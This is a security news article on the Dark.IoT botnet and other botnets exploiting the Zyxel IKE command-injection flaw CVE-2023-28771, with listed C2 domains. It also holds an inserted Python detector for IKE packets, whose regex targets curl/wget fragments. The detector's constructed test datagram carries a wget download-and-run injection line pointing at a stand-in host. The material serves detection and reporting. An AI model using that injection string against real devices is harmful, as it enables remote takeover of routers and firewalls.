Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks


The Dark.IoT botnet is a variant based on the Mirai botnet that first surfaced in August 2021 and has since expanded its targeting beyond IoT devices.

In a recent report, FortiGuard Labs uncovered a concerning rise in Distributed Denial of Service (DDoS) botnets exploiting the Zyxel vulnerability (CVE-2023-28771). The vulnerability, identified with a severity rating of 9.8 on the CVSS scoring system, affects multiple firewall models and allows unauthorized attackers to execute arbitrary code by sending a specially crafted packet to the targeted device.

The Zyxel vulnerability came into the spotlight in June 2023 when FortiGuard Labs detected the propagation of several DDoS botnets taking advantage of this security flaw. The flaw was initially reported by researchers from TRAPA Security, and Zyxel issued a security advisory on April 25, 2023. It was subsequently added to the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalogue in May 2023.

However, FortiGuard Labs’ recent analysis indicated a significant increase in attack bursts starting from May, with multiple botnets involved, including Dark.IoT, a variant based on the notorious Mirai botnet. Additionally, another botnet employed customized DDoS attack methods.

Researchers also identified the attackers’ IP addresses, which showed that the attacks spanned various regions, including Central America, North America, East Asia, and South Asia.

Increasing activity of the botnet (FortiGuard Labs)

The attacks specifically targeted the command injection vulnerability in the Internet Key Exchange (IKE) packet transmitted over UDP on Zyxel devices. The attackers utilized tools such as curl or wget to download scripts for further actions. These scripts were tailored for the MIPS architecture, pointing to a highly specific target.
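As an added defender-side illustration (not code from the FortiGuard report), the following Python sketch parses the 28-byte ISAKMP header of a UDP datagram bound for an IKE port and flags the two things the paragraph above describes: shell command fragments carrying curl/wget downloaders inside the IKE payload, plus a header whose version or length field does not match the datagram. The sample datagrams and the `.example` host are constructed for the example; the pattern is a heuristic for monitoring, not a signature for CVE-2023-28771.

```python
import re
import struct

# ISAKMP/IKE header (RFC 2408 / RFC 7296): two 8-byte SPIs, next payload,
# version, exchange type, flags, message ID, total length; 28 bytes, big-endian.
IKE_HEADER = struct.Struct(">8s8sBBBBII")
IKE_PORTS = {500, 4500}

# Shell fragments that have no business inside an IKE payload: command
# chaining or substitution followed by a downloader/interpreter, or a bare
# curl/wget fetch of a URL. Alternation is kept simple to avoid backtracking.
INJECTION_PATTERN = re.compile(
    rb"(?:;|\|\||&&|\$\(|`)\s*(?:curl|wget|sh|chmod|busybox)\b"
    rb"|\b(?:curl|wget)\b.{0,40}?(?:https?|tftp)://",
    re.IGNORECASE | re.DOTALL,
)


def inspect_ike_datagram(dst_port: int, payload: bytes) -> dict:
    """Return a verdict for one UDP datagram: {'suspicious': bool, 'reason': str}."""
    if dst_port not in IKE_PORTS or len(payload) < IKE_HEADER.size:
        return {"suspicious": False, "reason": "not an IKE datagram"}
    _ispi, _rspi, _next, version, _exch, _flags, _msgid, length = IKE_HEADER.unpack_from(payload)
    reasons = []
    # Version byte is 0x10 for IKEv1 and 0x20 for IKEv2; anything else is malformed.
    if version not in (0x10, 0x20):
        reasons.append(f"unexpected IKE version byte 0x{version:02x}")
    # The header's length field must equal the datagram size; mismatches are a common malformed-packet tell.
    if length != len(payload):
        reasons.append(f"header length {length} != datagram length {len(payload)}")
    match = INJECTION_PATTERN.search(payload[IKE_HEADER.size:])
    if match:
        reasons.append(f"shell fragment in IKE payload: {match.group(0)[:40]!r}")
    return {"suspicious": bool(reasons), "reason": "; ".join(reasons) or "clean"}


def _ike_datagram(version: int, body: bytes) -> bytes:
    """Constructed test datagram: IKE_SA_INIT-style header with a correct length field."""
    return IKE_HEADER.pack(b"\x11" * 8, b"\x00" * 8, 33, version, 34, 0x08, 0,
                           IKE_HEADER.size + len(body)) + body


# Constructed samples: an ordinary-looking IKEv2 payload, and one carrying a
# download-and-run shell fragment of the kind the article describes.
BENIGN = _ike_datagram(0x20, bytes(60))
INJECTED = _ike_datagram(0x20, b"\x00" * 8 + b"A;wget http://c2.example/bot.mips -O /tmp/b;sh /tmp/b")

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("injected", INJECTED)):
        print(name, inspect_ike_datagram(500, pkt))
```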

One of the identified botnets, Dark.IoT, made its appearance in 2021 and has since expanded its targeting beyond IoT devices.

The botnet employs the ChaCha20 cryptographic algorithm for encryption and utilizes multiple C2 (Command and Control) servers, including “raw.pastebin.com,” “hoz.1337.cx,” “babaroga.lib,” “dragon.lib,” “blacknurse.lib,” “tempest.lib,” “routercontroller.geek,” and “dvrcontroller.libre.”

The presence of exposed vulnerabilities in devices poses significant risks, as threat actors can gain control over vulnerable devices and incorporate them into their botnets for further attacks, like DDoS assaults.

FortiGuard Labs emphasizes the importance of promptly applying patches and updates to mitigate these risks and ensure the security of IoT devices and Linux servers.

In light of these findings, it is crucial for organizations and users to stay vigilant and take proactive measures to protect their systems from potential exploits. Addressing vulnerabilities promptly is essential in safeguarding against DDoS botnet attacks and other malicious activities targeting vulnerable IoT devices.

As cybersecurity researchers continue to monitor and analyze emerging threats, raising awareness about the importance of security updates and best practices remains vital in safeguarding the digital ecosystem.
